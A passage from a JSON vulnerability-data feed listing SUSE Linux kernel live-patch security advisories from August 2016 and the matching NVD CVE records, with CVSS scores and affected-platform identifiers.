"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:02", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "description": "This update for the Linux Kernel 3.12.55-52_42 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bsc#979064).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\n", "edition": 1, "modified": "2016-08-09T17:25:21", "published": "2016-08-09T17:25:21", "id": "SUSE-SU-2016:2006-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00019.html", "type": "suse", "title": "Security update for Linux Kernel Live Patch 12 for SLE 12 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:31:56", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "description": "This update for the Linux Kernel 3.12.51-52_39 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bsc#979064).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\n", "edition": 1, "modified": "2016-08-09T17:32:41", "published": "2016-08-09T17:32:41", "id": "SUSE-SU-2016:2010-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00022.html", "type": "suse", "title": "Security update for Linux Kernel Live Patch 11 for SLE 12 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:02:17", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "description": "This update for the Linux Kernel 3.12.51-52_34 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bsc#979064).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\n", "edition": 1, "modified": "2016-08-09T17:20:56", "published": "2016-08-09T17:20:56", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00016.html", "id": "SUSE-SU-2016:2002-1", "title": "Security update for Linux Kernel Live Patch 10 for SLE 12 (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:14:55", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "description": "This update for the Linux Kernel 3.12.44-52_18 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bsc#979064).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\n", "edition": 1, "modified": "2016-08-09T17:38:57", "published": "2016-08-09T17:38:57", "id": "SUSE-SU-2016:2014-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00026.html", "type": "suse", "title": "Security update for Linux Kernel Live Patch 7 for SLE 12 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:25", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "description": "This update for the Linux Kernel 3.12.53-60_30 fixes the several issues.\n\n These security issues were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bsc#979064).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n This non-security issue was fixed:\n - bsc#973570: The fix for CVE-2013-7446 introduced a bug that could have\n possibly lead to a softlockup.\n\n", "edition": 1, "modified": "2016-08-09T17:26:55", "published": "2016-08-09T17:26:55", "id": "SUSE-SU-2016:2007-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00020.html", "type": "suse", "title": "Security update for Linux Kernel Live Patch 3 for SLE 12 SP1 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-0758", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "description": "This update for the Linux Kernel 3.12.55-52_45 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bsc#979064).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\n", "edition": 1, "modified": "2016-08-09T17:19:35", "published": "2016-08-09T17:19:35", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00015.html", "id": "SUSE-SU-2016:2001-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 13 for SLE 12 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2021-02-02T06:21:30", "description": "The skb_copy_and_csum_datagram_iovec function in net/core/datagram.c in the Linux kernel 3.14.54 and 3.18.22 does not accept a length argument, which allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact via a write system call followed by a recvmsg system call.", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-02T10:59:00", "title": "CVE-2015-8019", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8019"], "modified": "2016-11-28T19:45:00", "cpe": ["cpe:/o:linux:linux_kernel:3.14.54", "cpe:/o:linux:linux_kernel:3.18.22"], "id": "CVE-2015-8019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8019", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.14.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.18.22:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:07:01", "description": "Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel before 4.3.3 allows local users to bypass intended AF_UNIX socket permissions or cause a denial of service (panic) via crafted epoll_ctl calls.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 6, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "baseScore": 5.3, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.2}, "published": "2015-12-28T11:59:00", "title": "CVE-2013-7446", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.4, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7446"], "modified": "2018-08-13T21:47:00", "cpe": ["cpe:/o:linux:linux_kernel:4.3.2"], "id": "CVE-2013-7446", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7446", "cvss": {"score": 5.4, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.3.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:31", "description": "The hub_activate function in drivers/usb/core/hub.c in the Linux kernel before 4.3.5 does not properly maintain a hub-interface data structure, which allows physically proximate attackers to cause a denial of service (invalid memory access and system crash) or possibly have unspecified other impact by unplugging a USB hub device.\n<a href=\"http://cwe.mitre.org/data/definitions/476.html\">CWE-476: NULL Pointer Dereference</a>", "edition": 6, "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-27T17:59:00", "title": "CVE-2015-8816", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8816"], "modified": "2016-12-03T03:14:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_live_patching:12.0", "cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/o:linux:linux_kernel:4.3.4", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:11", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:novell:suse_linux_enterprise_module_for_public_cloud:12", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:11.0", "cpe:/o:novell:suse_linux_enterprise_server:11", "cpe:/o:novell:suse_linux_enterprise_debuginfo:11", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:12"], "id": "CVE-2015-8816", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8816", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:11:sp4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_module_for_public_cloud:12:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11:sp4:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11:extra:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_debuginfo:11:sp4:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_live_patching:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:11.0:sp4:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:04", "description": "The asn1_ber_decoder function in lib/asn1_decoder.c in the Linux kernel before 4.3 allows attackers to cause a denial of service (panic) via an ASN.1 BER file that lacks a public key, leading to mishandling by the public_key_verify_signature function in crypto/asymmetric_keys/public_key.c.", "edition": 11, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-05-02T10:59:00", "title": "CVE-2016-2053", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2053"], "modified": "2018-08-30T16:52:00", "cpe": [], "id": "CVE-2016-2053", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2053", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": []}, {"lastseen": "2021-02-02T06:28:05", "description": "The netfilter subsystem in the Linux kernel through 4.5.2 does not validate certain offset fields, which allows local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call.", "edition": 6, "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-27T17:59:00", "title": "CVE-2016-3134", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3134"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_live_patching:12.0", "cpe:/o:novell:suse_linux_enterprise_server:11.0", "cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/o:novell:suse_linux_enterprise_module_for_public_cloud:12.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:novell:suse_linux_enterprise_debuginfo:11.0", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:12.0", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:11.0", "cpe:/o:linux:linux_kernel:4.5.2"], "id": "CVE-2016-3134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3134", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:extra:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_module_for_public_cloud:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_debuginfo:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_live_patching:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:07", "description": "The key_reject_and_link function in security/keys/key.c in the Linux kernel through 4.6.3 does not ensure that a certain data structure is initialized, which allows local users to cause a denial of service (system crash) via vectors involving a crafted keyctl request2 command.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-06-27T10:59:00", "title": "CVE-2016-4470", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": 